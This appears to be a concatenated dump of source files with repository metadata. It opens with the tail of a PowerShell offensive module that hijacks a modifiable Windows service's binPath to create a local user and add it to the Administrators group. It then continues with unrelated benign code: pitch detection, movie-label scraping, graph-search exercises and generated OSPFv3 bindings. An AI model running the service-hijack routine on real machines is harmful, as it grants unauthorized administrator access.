Write-Verbose "Service '$ServiceName' original path: '$OriginalPath'"
Write-Verbose "Service '$ServiceName' original state: '$OriginalState'"
Write-Verbose "Adding user '$UserName'"
# stop the service
$result = sc.exe stop $($TargetService.Name)
if ($result -contains "Access is denied."){
Write-Warning "[!] Access to service $($TargetService.Name) denied"
return $false
}
# modify the service path to add a user
$UserAddCommand = "net user $UserName $Password /add"
# change the path name to the user add command- if sc config doesn't error out here,
# it shouldn't later on
$result = sc.exe config $($TargetService.Name) binPath= $UserAddCommand
if ($result -contains "Access is denied."){
Write-Warning "[!] Access to service $($TargetService.Name) denied"
return $false
}
            # start the service and breathe
$result = sc.exe start $($TargetService.Name)
Start-Sleep -s 1
Write-Verbose "Adding user '$UserName' to group '$GroupName'"
# stop the service
$result = sc.exe stop $($TargetService.Name)
Start-Sleep -s 1
# modify the service path to add the user to the specified local group
$GroupAddCommand = "net localgroup $GroupName $UserName /add"
# change the path name to the group add command
$result = sc.exe config $($TargetService.Name) binPath= $GroupAddCommand
            # start the service and breathe
$result = sc.exe start $($TargetService.Name)
Start-Sleep -s 1
Write-Verbose "Restoring original path to service '$ServiceName'"
# stop the service
$result = sc.exe stop $($TargetService.Name)
Start-Sleep -s 1
# restore the original binary path
$result = sc.exe config $($TargetService.Name) binPath= $OriginalPath
# try to restore the service to whatever state it was
if ($RestoreDisabled){
Write-Verbose "Re-disabling service '$ServiceName'"
                $result = sc.exe config $($TargetService.Name) start= disabled
}
elseif ($OriginalState -eq "Paused"){
Write-Verbose "Starting and then pausing service '$ServiceName'"
$result = sc.exe start $($TargetService.Name)
Start-Sleep -s .5
$result = sc.exe pause $($TargetService.Name)
}
elseif ($OriginalState -eq "Stopped"){
Write-Verbose "Leaving service '$ServiceName' in stopped state"
}
else{
Write-Verbose "Starting service '$ServiceName'"
$result = sc.exe start $($TargetService.Name)
}
"[+] User '$UserName' created with password '$Password' and added to localgroup '$GroupName'"
}
catch{
Write-Warning "Error while modifying service '$ServiceName': $_"
$false
}
}
else{
Write-Warning "Target service '$ServiceName' not found on the machine"
$false
}
} Invoke-ServiceUserAdd"""
for option,values in self.options.iteritems():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
script += " -" + str(option)
else:
script += " -" + str(option) + " " + str(values['Value'])
return script
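# For illustration (hypothetical option values): with ServiceName set to 'VulnSVC'
# and the defaults above, the loop appends one flag per non-agent option, e.g.
#   Invoke-ServiceUserAdd -ServiceName VulnSVC -UserName john -Password Password123! -GroupName Administrators
# as the final line of the returned PowerShell script.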
|
[
"will@harmj0y.net"
] |
will@harmj0y.net
|
5b5134d7c642c9e9564c16bed4747780a807ce99
|
d38579c656f76a9f021eccd6e5943d4ce097ac9d
|
/pyrevoice/yin.py
|
b4d74246edc7c17c4442db1195a4cb7c14fe648e
|
[
"MIT"
] |
permissive
|
tuxzz/revoice_core
|
d821cd2eb929a79abac3ff9a330e3101ad56b5ea
|
1f2487f16d9a0d9ffa8bb0ae6e0cd93781ed297a
|
refs/heads/master
| 2019-07-15T08:27:26.937116
| 2017-11-04T07:19:41
| 2017-11-04T07:19:41
| 84,322,094
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,561
|
py
|
import numpy as np
import numba as nb
import scipy.signal as sp  # assumption: sp = scipy.signal, used by doPrefilter below (firwin, fftconvolve)

from .common import *
def difference(x):
frameSize = len(x)
paddedSize = roundUpToPowerOf2(frameSize)
outSize = frameSize // 2
out = np.zeros(outSize, dtype = np.float64)
# POWER TERM CALCULATION
# ... for the power terms in equation (7) in the Yin paper
powerTerms = np.zeros(outSize, dtype = np.float64)
powerTerms[0] = np.sum(x[:outSize] ** 2)
for i in range(1, outSize):
        powerTerms[i] = powerTerms[i - 1] - x[i - 1] * x[i - 1] + x[i + outSize] * x[i + outSize]
# YIN-STYLE ACF via FFT
# 1. data
transformedAudio = np.fft.rfft(x, n = paddedSize)
# 2. half of the data, disguised as a convolution kernel
kernel = x[:outSize][::-1]
transformedKernel = np.fft.rfft(kernel, n = paddedSize)
# 3. convolution
yinStyleACF = transformedAudio * transformedKernel
correlation = np.fft.irfft(yinStyleACF)
# CALCULATION OF difference function
# according to (7) in the Yin paper
out = powerTerms[0] + powerTerms - 2 * correlation[outSize - 1:frameSize - 1]
return out
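# In the notation of the YIN paper (de Cheveigné & Kawahara, 2002), equation (7)
# expresses the difference function through autocorrelation terms:
#     d_t(tau) = r_t(0) + r_{t+tau}(0) - 2 * r_t(tau)
# powerTerms above supplies r_t(0) and r_{t+tau}(0); the FFT-based convolution
# supplies r_t(tau).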
@nb.jit(nb.float64[:](nb.float64[:]), cache=True)
def cumulativeDifference(x):
out = x.copy()
nOut = len(out)
out[0] = 1.0
    total = 0.0
    for i in range(1, nOut):
        total += out[i]
        if(total == 0.0):
            out[i] = 1
        else:
            out[i] *= i / total
return out
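# This implements the cumulative mean normalized difference, equation (8) of the
# YIN paper:
#     d'_t(0) = 1,   d'_t(tau) = d_t(tau) / ((1/tau) * sum_{j=1..tau} d_t(j))
# which the running `total` above computes incrementally.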
def findValleys(x, minFreq, maxFreq, sr, threshold = 0.5, step = 0.01):
ret = []
begin = max(1, int(sr / maxFreq))
end = min(len(x) - 1, int(np.ceil(sr / minFreq)))
for i in range(begin, end):
prev = x[i - 1]
curr = x[i]
        nxt = x[i + 1]  # renamed from `next` to avoid shadowing the builtin
        if(prev > curr and nxt > curr and curr < threshold):
threshold = curr - step
ret.append(i)
return ret
def doPrefilter(x, maxFreq, sr):
filterOrder = int(2048 * sr / 44100.0)
if(filterOrder % 2 == 0):
filterOrder += 1
f = sp.firwin(filterOrder, max(maxFreq + 500.0, maxFreq * 3.0), window = "blackman", nyq = sr / 2.0)
halfFilterOrder = filterOrder // 2
x = sp.fftconvolve(x, f)[halfFilterOrder:-halfFilterOrder]
return x
class Processor:
def __init__(self, sr, **kwargs):
self.samprate = float(sr)
self.hopSize = kwargs.get("hopSize", roundUpToPowerOf2(self.samprate * 0.0025))
self.minFreq = kwargs.get("minFreq", 80.0)
self.maxFreq = kwargs.get("maxFreq", 1000.0)
self.windowSize = kwargs.get("windowSize", max(roundUpToPowerOf2(self.samprate / self.minFreq * 2), self.hopSize * 4))
self.prefilter = kwargs.get("prefilter", True)
self.valleyThreshold = kwargs.get("valleyThreshold", 0.5)
self.valleyStep = kwargs.get("valleyStep", 0.01)
def __call__(self, x, removeDC = True):
nX = len(x)
nHop = getNFrame(nX, self.hopSize)
if(removeDC):
x = simpleDCRemove(x)
if(self.prefilter):
x = doPrefilter(x, self.maxFreq, self.samprate)
out = np.zeros(nHop, dtype = np.float64)
for iHop in range(nHop):
frame = getFrame(x, iHop * self.hopSize, self.windowSize)
buff = difference(frame)
buff = cumulativeDifference(buff)
valleyIndexList = findValleys(buff, self.minFreq, self.maxFreq, self.samprate, threshold = self.valleyThreshold, step = self.valleyStep)
out[iHop] = self.samprate / parabolicInterpolation(buff, valleyIndexList[-1], val = False) if(valleyIndexList) else 0.0
return out
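
# A minimal usage sketch (hypothetical signal; assumes the helpers star-imported
# from .common, e.g. getFrame and parabolicInterpolation, are available):
#
#   proc = Processor(44100, minFreq=80.0, maxFreq=1000.0)
#   f0 = proc(x)  # x: 1-D float64 array; one f0 estimate per hop,
#                 # 0.0 where no valley passes the YIN threshold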
|
[
"dorazzsoft@gmail.com"
] |
dorazzsoft@gmail.com
|
ebc21d4712901696d0412661c94a1649a05d05f9
|
bae0de8220dcfda0efd6490d1516353d0399de69
|
/dataHandling/itemLabels.py
|
ac3d067a4a19c38826ec2f81bdb0b12935524a13
|
[] |
no_license
|
mkaminskas/beyond_accuracy
|
1be5f49182fd7d1a99b84768c00ac094237a364c
|
96a8bddd882c308bb267ea7d8815c31cd73bc971
|
refs/heads/master
| 2020-04-24T01:31:33.140677
| 2016-08-30T23:32:17
| 2016-08-30T23:32:17
| 66,984,368
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,790
|
py
|
'''
Created on 13 Jan 2015
a module for getting item labels using the external APIs
@author: mkaminskas
'''
import ast
import logging
import operator
import os
import sys
from time import time
from utils import config
req_version = (2,7)
cur_version = sys.version_info
if cur_version >= req_version:
# import musicbrainz2.webservice as ws
# import pylast
import imdb
'''
get IMDB plot keywords for a movie
'''
def _getIMDBDataByTitle(title):
try:
ia = imdb.IMDb()
movie = ia.search_movie(title)[0]
ia.update(movie, 'keywords')
return movie['keywords']
except Exception, e:
print e,': could not get keywords for the movie',title
return []
'''
get the artist names and if needed their tags using the MusicBrainz web service
if tags are found, return top 5 by count (or less if there aren't 5)
'''
def _getMusicBrainzDataByIndex(data_matrix, item_index, tags=False):
pass
#
# item_id = data_matrix.getItemId(item_index)
# if item_id == -1:
# print 'Could not find the id of artist '+str(item_index)
# else:
# # get artist name from MusicBrainz. 1s delay needed to avoid service error
# time.sleep(1)
# q = ws.Query()
# if tags:
# include = ws.ArtistIncludes(tags=True)
# else:
# include = None
#
# try:
# artist = q.getArtistById(item_id, include)
# artist_tags = [(tag.getValue(), tag.getCount()) for tag in artist.getTags()]
# return artist.getName(), sorted(artist_tags, key=operator.itemgetter(1), reverse=True)[:min(len(artist_tags),5)]
#
# except ws.WebServiceError, e:
#
# print 'Could not find the title of artist '+str(item_id)+': '+str(e)
# return None, None
'''
read top LastFM tags for an artist
'''
def _getLastFMDataById(item_id):
pass
#
# time.sleep(1)
#
# API_KEY = "e397a21f9334aaa9233e8d38ea2e6500" # this is a sample key
# network = pylast.LastFMNetwork(api_key=API_KEY)
#
# try:
# artist = network.get_artist_by_mbid(item_id)
# topItems = artist.get_top_tags(limit=10)
# if topItems:
# return artist.get_name(), [topItem.item.get_name().lower() for topItem in topItems]
# else:
# return None, None
# except Exception, e:
# print e
# return None, None
'''
write the file of movies and their content labels (genres + IMDB keywords)
'''
def _generateMovieLabels(dataset='old'):
'''
dataset = old | new | big
    although the 'new' and 'big' setups require updating the IMDB parser
'''
t = time()
if dataset == 'old':
logging.info('generating labels for the 1M Movielens data...')
source_data_path = config.MOVIELENS_DATA
destination_data_path = config.MOVIE_FILE_IMDB
data_separator = '::'
elif dataset == 'new':
logging.info('generating labels for the latest Movielens data...')
source_data_path = config.MOVIELENS_DATA_NEW
destination_data_path = config.MOVIE_FILE_IMDB
data_separator = ','
elif dataset == 'big':
logging.info('generating labels for the 20M Movielens data...')
source_data_path = ''
destination_data_path = ''
data_separator = ','
else:
raise ValueError('Wrong type of dataset entered.')
processed_movies = set()
    # before reading the data, need to construct a list of already processed movies
with open(destination_data_path,'rb') as movies:
for line in movies:
data = line.split('::')
processed_movies.add(data[0])
with open(source_data_path, 'rb') as f:
with open(destination_data_path,'a') as movie_file:
for line in f:
data = line.split(data_separator)
movie_id = data[0]
if (movie_id not in processed_movies):
movie_title = data[1].decode('utf8')
movie_genres = data[2].rstrip().split('|')
movie_keywords = _getIMDBDataByTitle(movie_title)
movie_labels = "|".join(movie_genres + movie_keywords)
movie_file.write(movie_id+'::'+movie_title.encode('utf8')+'::'+movie_labels.encode('utf8')+'\n')
processed_movies.add(movie_id)
print 'done with movie',movie_title
print 'number of unique movies:',len(processed_movies)
print("movie data generated in %0.3fs." % (time() - t))
'''
write the file of unique artists and their LastFM tags
the processed_artists set needed to make this method re-runnable
'''
def _generateArtistLabels():
t = time()
unidentified_artists = set()
processed_artists = set()
# before reading the data, need to construct a list of already processed artists
with open(config.ARTIST_FILE_LASTFM,'rb') as artists:
for line in artists:
data = line.split('::')
processed_artists.add(data[0])
with open(config.LASTFM_DATA, 'rb') as f:
with open(config.ARTIST_FILE_LASTFM,'a') as artist_file:
for line in f:
data = line.split('\t')
artist_id = data[2]
if artist_id != '':
# check if the artist is not yet processed
if (artist_id not in processed_artists) and (artist_id not in unidentified_artists):
artist_name, artist_tags = _getLastFMDataById(artist_id)
# only record artists that have at least 3 tags
if artist_name and len(artist_tags) >= 3:
labels = "|".join(artist_tags)
artist_file.write(artist_id+'::'+artist_name.encode('utf8')+'::'+labels.encode('utf8')+'\n')
processed_artists.add(artist_id)
else:
unidentified_artists.add(artist_id)
print 'number of unique artists:',len(processed_artists)
print("artist data generated in %0.3fs." % (time() - t))
def getMovieSynopsisForSurvey(iteration):
'''
get the genres and plot synopsis for movies used in the user study
'''
movies = {}
# with open(os.path.join(config.PACKAGE_DIR, '../survey/mov.txt'),'rb') as f:
# movies = ast.literal_eval(f.readline())
with open(os.path.join(config.PACKAGE_DIR, '../survey/survey'+str(iteration)+'.dat'),'rb') as survey_file:
for line in survey_file:
if '"' not in line:
continue
titles = line.split('"')[1::2]
for title in titles:
if title not in movies:
try:
ia = imdb.IMDb()
movie = ia.search_movie(title)[0]
movie = ia.get_movie(movie.movieID)
movies[title] = {'genres':movie.get('genres'), 'plot':movie.get('plot outline')}
print 'processed',len(movies),'movies'
except Exception, e:
print 'could not get the data for movie',title
print e
# writing the sorted dict to a file
with open(os.path.join(config.PACKAGE_DIR, '../survey/movies'+str(iteration)+'.dat'),'wb') as movie_file:
for key in sorted(movies):
if movies[key]['genres'] is None:
genres = 'None'
else:
genres = " | ".join(movies[key]['genres'])
if movies[key]['plot'] is None:
plot = 'None'
else:
plot = movies[key]['plot']
movie_file.write(key+' | '+genres.encode('utf8')+'\nsynopsis: '+plot+'\n-------------------------\n')
if __name__ == "__main__":
# _generateMovieLabels()
# _generateArtistLabels()
for i in range(1,6):
getMovieSynopsisForSurvey(i)
|
[
"marius.kaminskas@gmail.com"
] |
marius.kaminskas@gmail.com
|
dd5cc1124326b728e2cc2c981f35498c20b46681
|
6ecff67d6103ddbd787f78c35182722b83b8a37e
|
/백준/Python/카테고리/BFS/1260(DFS와 BFS).py
|
681e7643a027fa4f36297f7963bd89521f5ead1b
|
[] |
no_license
|
jsungmin6/Algorithm
|
9ef2339aa00921e7df756a8dff569954a008c118
|
bc1ea9de9f7ba3f1aa6616ebef8719540d72e0bf
|
refs/heads/master
| 2023-05-27T06:24:16.123307
| 2021-06-11T09:22:21
| 2021-06-11T09:22:21
| 259,299,624
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,090
|
py
|
from collections import deque
N,M,V = map(int,input().split())
graph=[[] for i in range(N+1)]
for _ in range(M):
x,y = map(int,input().split())
graph[x].append(y)
graph[y].append(x)
def bfs(V):
visited=[-1]*(N+1)
q=deque([V])
answer=[]
while q:
node = q.popleft()
if visited[node] == 1:
continue
answer.append(node)
visited[node] = 1
next_graph = sorted(graph[node])
for i in next_graph:
if visited[i] == -1:
q.append(i)
return answer
def dfs(V):
visited=[-1]*(N+1)
need_visited = [V]
answer=[]
while need_visited:
node = need_visited.pop()
if visited[node] == 1:
continue
answer.append(node)
visited[node] = 1
next_graph = sorted(graph[node],reverse=True)
for i in next_graph:
if visited[i] == -1:
need_visited.append(i)
return answer
for i in dfs(V):
print(i,end=' ')
print()
for i in bfs(V):
print(i,end=' ')
|
[
"jsungmin506@gmail.com"
] |
jsungmin506@gmail.com
|
63402bccbc8601342eea789d488111371a150ffe
|
3faf4b9fb76145b2326446bc6bc190a5712b3b62
|
/Algorithms/0704 Binary Search.py
|
8676c3a62d7bcdb529d9fb70400f668484d86646
|
[] |
no_license
|
cravo123/LeetCode
|
b93c18f3e4ca01ea55f4fdebceca76ccf664e55e
|
4c1288c99f78823c7c3bac0ceedd532e64af1258
|
refs/heads/master
| 2021-07-12T11:10:26.987657
| 2020-06-02T12:24:29
| 2020-06-02T12:24:29
| 152,670,206
| 6
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 948
|
py
|
# Solution 1, binary search
# There are several implementations of binary search.
# The key point is that m = (i + j) // 2 equals i when j = i + 1,
# so we cannot set i = m, or the loop would never terminate.
from typing import List

class Solution:
def search(self, nums: 'List[int]', target: 'int') -> 'int':
i, j = 0, len(nums) - 1
while i < j:
m = (i + j) // 2
if nums[m] < target:
i = m + 1 # gotcha
else:
j = m
return i if nums[i] == target else -1
# Solution 1.1, another Binary Search implementation
class Solution:
def search(self, nums: List[int], target: int) -> int:
i, j = 0, len(nums) - 1
while i <= j:
m = (i + j) // 2
if nums[m] < target:
i = m + 1
elif nums[m] > target:
j = m - 1
else:
return m
return -1
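
# Quick sanity check (hypothetical inputs):
#   Solution().search([-1, 0, 3, 5, 9, 12], 9)  # -> 4
#   Solution().search([-1, 0, 3, 5, 9, 12], 2)  # -> -1
# Both variants return the index of target in the sorted list, or -1 if absent.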
|
[
"cc3630@columbia.edu"
] |
cc3630@columbia.edu
|
0b61511b3ce7aa503737305f9c1f8641e0d4e1cd
|
b25a1553616815d98eb89dc9d99c9d18a922b6a4
|
/OOP.py
|
f1e545ab45948ffe266529e78a0c13832afe3557
|
[] |
no_license
|
shaltiel16-meet/MEET-YL1
|
bba46ad4a9b6677273b74eaf3358533f9c10935d
|
867203e58f436736118bf458ad2391f6da84fca8
|
refs/heads/master
| 2020-03-27T00:43:27.729888
| 2015-01-25T17:59:21
| 2015-01-25T17:59:21
| 26,919,629
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 497
|
py
|
class Animal:
def __init__ (self, name, age, color, size):
self.name = name
self.age = age
self.color = color
self.size = size
def print_all(self):
print(self.name)
print(self.age)
print(self.color)
print(self.size)
def eat(self, food):
print("The Animal " + self.name + " is eating " + food)
def sleep(self, dream):
print("The Animal " + self.name + " is sleeping for " + str(dream) + " hours")
a = Animal("me", 22, "red", "tiny")
a.print_all()
a.eat("pizza")
a.sleep(2)
|
[
"shaltiel16@meet.mit.edu"
] |
shaltiel16@meet.mit.edu
|
0926160d3b26317b602ba8ef2c6b5fd32b837128
|
5b4264b5ee27aefdc9c25cae4e57d1bbeeef9b91
|
/Code up 100/1037.py
|
6219c86c4ea4b246b40ed42a5767755ef0564205
|
[] |
no_license
|
WinterBlue16/Coding_Test
|
971f04dfad9e6b7cef2be56daf090f4ca19884d4
|
13a201e423667f703cf274476cbe6aa88e0da373
|
refs/heads/master
| 2023-04-07T11:20:16.239647
| 2021-04-05T03:59:07
| 2021-04-05T03:59:07
| 244,624,437
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 78
|
py
|
# Solution 1
print(chr(int(input())))
# Solution 2
x = int(input())
print(chr(x))
|
[
"leekh090163@gmail.com"
] |
leekh090163@gmail.com
|
b38b3b1da456bddb39c20619c6c7c34fb4d7c940
|
51f887286aa3bd2c3dbe4c616ad306ce08976441
|
/pybind/nos/v7_2_0/interface/port_channel/ipv6/interface_ospfv3_conf/__init__.py
|
abb6de36910486b150c264492beb3261efbc2737
|
[
"Apache-2.0"
] |
permissive
|
b2220333/pybind
|
a8c06460fd66a97a78c243bf144488eb88d7732a
|
44c467e71b2b425be63867aba6e6fa28b2cfe7fb
|
refs/heads/master
| 2020-03-18T09:09:29.574226
| 2018-04-03T20:09:50
| 2018-04-03T20:09:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 48,400
|
py
|
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__
import bfd
import authentication
import link_interval_properties
class interface_ospfv3_conf(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module brocade-interface - based on the path /interface/port-channel/ipv6/interface-ospfv3-conf. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: Open Shortest Path First version 3 (OSPFv3)
"""
__slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__interface_area','__active','__passive','__bfd','__cost','__instance','__mtu_ignore','__network','__priority','__suppress_linklsa','__authentication','__link_interval_properties',)
_yang_name = 'interface-ospfv3-conf'
_rest_name = 'ospf'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
path_helper_ = kwargs.pop("path_helper", None)
if path_helper_ is False:
self._path_helper = False
elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):
self._path_helper = path_helper_
elif hasattr(self, "_parent"):
path_helper_ = getattr(self._parent, "_path_helper", False)
self._path_helper = path_helper_
else:
self._path_helper = False
extmethods = kwargs.pop("extmethods", None)
if extmethods is False:
self._extmethods = False
elif extmethods is not None and isinstance(extmethods, dict):
self._extmethods = extmethods
elif hasattr(self, "_parent"):
extmethods = getattr(self._parent, "_extmethods", None)
self._extmethods = extmethods
else:
self._extmethods = False
self.__priority = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0..255']}), is_leaf=True, yang_name="priority", rest_name="priority", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Interface priority'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='uint32', is_config=True)
self.__suppress_linklsa = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="suppress-linklsa", rest_name="suppress-linklsa", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Suppress link LSA advertisements'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='empty', is_config=True)
self.__network = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'broadcast': {'value': 1}, u'point-to-point': {'value': 2}},), is_leaf=True, yang_name="network", rest_name="network", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Interface type'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='enumeration', is_config=True)
self.__bfd = YANGDynClass(base=bfd.bfd, is_container='container', presence=False, yang_name="bfd", rest_name="bfd", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Set BFD operation mode on this interface'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='container', is_config=True)
self.__mtu_ignore = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="mtu-ignore", rest_name="mtu-ignore", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'To disable OSPFv3 MTU mismatch detection'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='empty', is_config=True)
self.__passive = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="passive", rest_name="passive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Passive information'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='empty', is_config=True)
self.__instance = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0..255']}), default=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32)(0), is_leaf=True, yang_name="instance", rest_name="instance", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Instance of OSPFv3 protocol on this interface'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='uint32', is_config=True)
self.__authentication = YANGDynClass(base=authentication.authentication, is_container='container', presence=False, yang_name="authentication", rest_name="authentication", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure authentication for the interface', u'cli-incomplete-no': None}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='container', is_config=True)
self.__cost = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'1..65535']}), default=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32)(1), is_leaf=True, yang_name="cost", rest_name="cost", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Interface cost', u'cli-trim-default': None}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='uint32', is_config=True)
self.__active = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="active", rest_name="active", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Active information'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='empty', is_config=True)
self.__interface_area = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'((([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.)(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){2}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5]))|(([0-9])|([1-9]([0-9]{1,8}))|([1]([0-9]{1,9}))|([2][0]([0-9]{1,8}))|([2][1][0-3]([0-9]{1,7}))|([2][1][4][0-6]([0-9]{1,6}))|([2][1][4][7][0-3]([0-9]{1,5}))|([2][1][4][7][4][0-7]([0-9]{1,4}))|([2][1][4][7][4][8][0-2]([0-9]{1,3}))|([2][1][4][7][4][8][3][0-5]([0-9]{1,2}))|([2][1][4][7][4][8][3][6][0-3][0-9])|([2][1][4][7][4][8][3][6][4][0-7]))'}), is_leaf=True, yang_name="interface-area", rest_name="area", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'OSPF area', u'alt-name': u'area'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='ospf:ospf-area-id', is_config=True)
self.__link_interval_properties = YANGDynClass(base=link_interval_properties.link_interval_properties, is_container='container', presence=False, yang_name="link-interval-properties", rest_name="", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-drop-node-name': None}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='container', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return [u'interface', u'port-channel', u'ipv6', u'interface-ospfv3-conf']
def _rest_path(self):
if hasattr(self, "_parent"):
if self._rest_name:
return self._parent._rest_path()+[self._rest_name]
else:
return self._parent._rest_path()
else:
return [u'interface', u'Port-channel', u'ipv6', u'ospf']
def _get_interface_area(self):
"""
Getter method for interface_area, mapped from YANG variable /interface/port_channel/ipv6/interface_ospfv3_conf/interface_area (ospf:ospf-area-id)
YANG Description: Assign an OSPF area for the interface
"""
return self.__interface_area
def _set_interface_area(self, v, load=False):
"""
Setter method for interface_area, mapped from YANG variable /interface/port_channel/ipv6/interface_ospfv3_conf/interface_area (ospf:ospf-area-id)
If this variable is read-only (config: false) in the
source YANG file, then _set_interface_area is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_interface_area() directly.
YANG Description: Assign an OSPF area for the interface
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'((([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.)(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){2}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5]))|(([0-9])|([1-9]([0-9]{1,8}))|([1]([0-9]{1,9}))|([2][0]([0-9]{1,8}))|([2][1][0-3]([0-9]{1,7}))|([2][1][4][0-6]([0-9]{1,6}))|([2][1][4][7][0-3]([0-9]{1,5}))|([2][1][4][7][4][0-7]([0-9]{1,4}))|([2][1][4][7][4][8][0-2]([0-9]{1,3}))|([2][1][4][7][4][8][3][0-5]([0-9]{1,2}))|([2][1][4][7][4][8][3][6][0-3][0-9])|([2][1][4][7][4][8][3][6][4][0-7]))'}), is_leaf=True, yang_name="interface-area", rest_name="area", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'OSPF area', u'alt-name': u'area'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='ospf:ospf-area-id', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """interface_area must be of a type compatible with ospf:ospf-area-id""",
'defined-type': "ospf:ospf-area-id",
